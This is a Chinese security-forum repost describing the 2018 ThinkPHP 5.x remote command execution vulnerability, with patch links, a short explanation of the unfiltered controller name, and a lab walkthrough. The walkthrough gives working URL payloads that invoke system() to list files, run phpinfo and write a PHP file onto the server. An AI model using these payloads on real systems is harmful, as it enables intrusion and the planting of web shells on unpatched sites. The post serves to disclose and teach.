首页
社区
课程
招聘
[转帖] ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用
发表于: 2018-12-11 01:50 5547

[转帖] ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用

2018-12-11 01:50
5547

ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。

 

 

Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

 

Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

 

关键代码:

// 获取控制器名
$controller       = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));

在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。

漏洞利用

在线环境地址:https://www.vulnspy.com/cn-thinkphp-5.x-rce/

 

1. 点击右上角的 START TO HACK 按钮创建实验环境

 

 

2. 进入实验环境

 

 

3. 执行系统命令显示目录下文件

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

 

4. 执行phpinfo

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

5. 写info.php文件

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php

访问 info.php

 

参考


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 1
支持
分享
最新回复 (1)
雪    币: 272
活跃值: (209)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
这个需要tp程序本身存在一个action去调用了call_user_func_array才可以实现利用的啵,楼主能把相关函数贴下的么?
2018-12-11 09:23
0
游客
登录 | 注册 方可回帖
返回
//